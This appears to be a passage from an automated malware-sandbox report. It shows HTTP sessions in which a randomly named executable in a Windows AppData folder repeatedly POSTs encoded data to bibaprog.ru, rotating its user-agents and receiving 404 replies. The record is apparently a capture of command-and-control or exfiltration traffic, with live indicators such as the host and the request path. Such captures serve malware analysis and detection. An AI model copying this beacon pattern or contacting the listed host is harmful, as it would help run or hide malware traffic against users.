                                                          CF-RAY: 9015712cdcb2de95-EWR
                                                          alt-svc: h2=":443"; ma=60
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1854&min_rtt=1744&rtt_var=874&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=556190&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.549982104.21.64.1803292C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:38:20.848382950 CET347OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:38:21.194999933 CET344OUTData Raw: 00 04 01 02 03 0d 04 06 05 06 02 01 02 04 01 02 00 0b 05 0b 02 04 03 0b 07 07 0a 0c 06 0f 03 04 0f 00 05 0b 03 54 06 50 0e 0b 05 07 00 03 06 01 06 53 0d 0a 0c 57 01 04 04 07 04 04 07 07 05 0d 05 02 0f 0e 05 02 07 01 0f 04 0e 04 0a 04 0c 54 06 01
                                                          Data Ascii: TPSWTYTR\L}Qpq]c[}uflBi`BRLhwYxUs{`vkUtY^~_~V@@xmPL}r}
                                                          Jan 13, 2025 13:38:21.312488079 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:38:21.545388937 CET1022INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:38:21 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JulNbpO6M6cr2LMAd6WS5v%2BIqLg5U2YBcswd0H9dnuOUPPXkgsUQ0tctPoftPrFVJ5886s%2BR4XQ%2BptM%2BsA%2BwVEwAldu0R4lJzLdEptCPgfgtrWPpIPnwwlZuJwU%2BhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 9015715ee94ade95-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3520&min_rtt=1628&rtt_var=4394&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=87091&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.549983104.21.64.1801788C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:38:33.190608025 CET294OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:38:33.537319899 CET344OUTData Raw: 00 00 04 05 03 0b 04 07 05 06 02 01 02 02 01 0b 00 04 05 0f 02 01 03 01 07 03 0a 0c 03 0e 00 09 0e 02 03 0a 00 0c 07 00 0e 04 05 07 00 05 06 06 03 05 0b 0a 0d 54 01 0a 05 07 06 07 05 06 06 01 00 54 0a 00 07 06 06 56 0f 02 0d 00 0c 00 0e 55 02 0c
                                                          Data Ascii: TTVUPVR\L~|`fO`\\^v\hkouLcR{Y~ss_{odXxNjK~|@tdZ~e~V@z}T~b[
                                                          Jan 13, 2025 13:38:33.652694941 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:38:33.882955074 CET1008INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:38:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NKUYprkkH61xJDUpPBBF6Yqc671ldjVkPYWjS1HbiEVZ3WAJUJhdAkN6Q%2FK3KEYZWM6GJVbEwFCckIjN%2BTtzTnwYaxxTSA9urX2Od30xdkWEbdY3Q%2FsK2dzzzcWxhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 901571ac0f27de95-EWR
                                                          alt-svc: h2=":443"; ma=60
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3884&min_rtt=1573&rtt_var=5212&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=72770&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                          Jan 13, 2025 13:38:33.973479986 CET5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9192.168.2.549984104.21.64.180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:38:40.480601072 CET294OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:38:40.834306955 CET344OUTData Raw: 05 00 01 05 06 01 01 01 05 06 02 01 02 04 01 06 00 03 05 0e 02 03 03 0b 00 01 0a 01 04 53 03 04 0c 03 04 5e 02 51 07 0b 0c 57 05 04 00 04 07 01 06 06 0d 0c 0f 07 04 06 07 57 04 00 06 06 04 0e 00 53 0d 5a 00 07 06 06 0d 0f 0c 0e 0a 07 0c 02 06 0d
                                                          Data Ascii: S^QWWSZU\L~N`btbyuKUUkoetB^B``{oxZo`fI}ml@twRNj_~V@@{mv~L}
                                                          Jan 13, 2025 13:38:40.944037914 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:38:41.169760942 CET1015INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:38:41 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b4S762jdOnFtxG70urj1FVwLeee6ySKQ6f6m8YZ4SefX%2BTgtdm78g8bAokfY7l5wDj0vu69b4q2plVfsBXV70vm1bcdn6hxlz1icpF32%2F%2FlcKT%2FXXTbI8Ab4G9DyIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 901571d99d427c6a-EWR
                                                          alt-svc: h2=":443"; ma=60
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5001&min_rtt=1955&rtt_var=6825&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=55462&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10192.168.2.549985104.21.64.180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:38:51.704562902 CET282OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:38:52.052949905 CET344OUTData Raw: 00 0a 04 04 06 0b 01 0a 05 06 02 01 02 00 01 05 00 02 05 00 02 05 03 0e 00 55 0f 53 04 00 06 03 0f 05 04 0f 03 06 06 0a 0e 0b 05 07 05 07 07 05 07 04 0c 0e 0f 02 07 01 07 00 03 07 06 51 05 0f 00 53 0e 08 06 03 01 06 0f 07 0f 0f 0c 0d 0d 09 07 50
                                                          Data Ascii: USQSPWVRP\L}Skczvb[MwfcQkou`lRk]^J{lwxcvISRtgxje~V@{Sr}bi
                                                          Jan 13, 2025 13:38:52.152313948 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:38:52.373850107 CET1023INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:38:52 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Llc2qZbjFiVUanQLRGl8Se%2BsicWC%2FF%2FIwN32rA%2BYoF1NohCdAHVGUJrYypBacgeRPLmXfOGnzknHe3QnsHOjq5fSxdZYfHV%2FX5Wd%2FGayNj3LelB%2FzaVyUAJ4HKaH%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 9015721fae494414-EWR
                                                          alt-svc: h2=":443"; ma=60
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3979&min_rtt=1715&rtt_var=5171&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=626&delivery_rate=73629&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          11192.168.2.549986104.21.64.180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:39:02.578071117 CET282OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:39:02.967264891 CET344OUTData Raw: 00 03 01 02 06 0f 01 05 05 06 02 01 02 03 01 02 00 04 05 0c 02 01 03 0f 07 0f 0c 0c 03 04 03 55 0f 54 06 09 00 53 05 04 0d 03 02 0a 05 0b 06 02 06 06 0c 0a 0e 06 05 01 07 0f 07 05 05 02 04 0f 02 53 0f 5a 05 52 05 51 0b 01 0d 04 0c 04 0e 53 04 0c
                                                          Data Ascii: UTSSZRQSRSW\L~k^TOcrybepkoec|c^~chyooJ{iYknlcY]}e~V@xmT~bS
                                                          Jan 13, 2025 13:39:03.049335003 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:39:03.282569885 CET1017INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:39:03 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q0KkWIaKNGgig5Wjcbg1Kk%2BNj%2BiRSeqQhzumS6Tc6LCwq%2BS6%2Bp4SRkQbK%2Bgm5YLrg87jgxPvU6egWH2S5duCFIk1dC69hzT9ckXDsQ3pMnex0gnBubLHI9rYvjV2Wg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 90157263b8eede95-EWR
                                                          alt-svc: h2=":443"; ma=60
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3657&min_rtt=1750&rtt_var=4470&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=626&delivery_rate=85841&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          12192.168.2.549987104.21.64.180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:39:09.392708063 CET347OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                          Host: bibaprog.ru
                                                          Content-Length: 336
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:39:09.740566969 CET336OUTData Raw: 05 07 04 07 03 0b 04 05 05 06 02 01 02 05 01 07 00 01 05 0e 02 0d 03 0c 01 0f 0a 05 07 01 00 07 0d 53 04 0d 07 0c 04 0a 0b 05 06 00 06 06 07 54 07 03 0e 5c 0a 02 06 56 01 07 07 04 04 52 04 0a 01 03 0c 0d 05 52 04 54 0e 57 0b 04 0a 00 0d 04 05 03
                                                          Data Ascii: ST\VRRTWRSV\L~|`PM`Ln_vKh|By`o|Bc|l|glNrS]Pw^}_~V@xSn~uy
                                                          Jan 13, 2025 13:39:09.835675955 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:39:10.062700987 CET1012INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:39:10 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R8w2RbbRnkDk0NXQqvdq85upWQ2D3wA69CfGbiTJaBUOiemx9c1PbjQ7iEbQpfZKi5AhzJQ30Qaa3T%2BLYYe54NYP1cOwAU3ZlWRdUHecWZYGTISZ1DkSaS1Jew5pYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 9015728e3944de95-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4126&min_rtt=1626&rtt_var=5611&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=683&delivery_rate=67492&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          13192.168.2.549988104.21.64.180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:39:20.575989008 CET294OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:39:20.928175926 CET344OUTData Raw: 05 00 01 05 06 01 01 01 05 06 02 01 02 04 01 06 00 03 05 0e 02 03 03 0b 00 01 0a 01 04 53 03 04 0c 03 04 5e 02 51 07 0b 0c 57 05 04 00 04 07 01 06 06 0d 0c 0f 07 04 06 07 57 04 00 06 06 04 0e 00 53 0d 5a 00 07 06 06 0d 0f 0c 0e 0a 07 0c 02 06 0d
                                                          Data Ascii: S^QWWSZU\L~N`btbyuKUUkoetB^B``{oxZo`fI}ml@twRNj_~V@@{mv~L}
                                                          Jan 13, 2025 13:39:21.021404028 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:39:21.256438017 CET1009INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:39:21 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q2UikfKH73w4wsury6Wo2Pn5VM8G6KS9GfnQEJcsPVjkeyx91ReB5i4tiCE6QVO6YeQ9pN7mAitaK2nrvIFA9vXoeUvHLyMNpmlwr%2BZoyehEjxI0kLUE6cMdZB5QJg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 901572d4192dc358-EWR
                                                          alt-svc: h2=":443"; ma=60
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1547&rtt_var=661&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=780748&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          14192.168.2.549989104.21.64.180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:39:31.460133076 CET347OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:39:31.818763018 CET344OUTData Raw: 00 05 04 03 06 00 01 00 05 06 02 01 02 06 01 02 00 07 05 0a 02 0d 03 0b 02 54 0e 07 06 04 00 09 0f 55 07 0b 03 03 05 02 0c 50 04 0a 05 56 06 04 03 0a 0b 0f 0d 0e 06 57 06 07 05 04 06 06 07 0e 02 01 0a 0d 06 0f 04 02 0e 03 0f 57 0e 01 0b 06 04 05
                                                          Data Ascii: TUPVWWR]TQ\L}Q~`TO`\T^ufkPv\w\~`tIxoxpX|~|AtgZe~V@BxmfOb}
                                                          Jan 13, 2025 13:39:31.942730904 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:39:32.165982008 CET1020INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:39:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
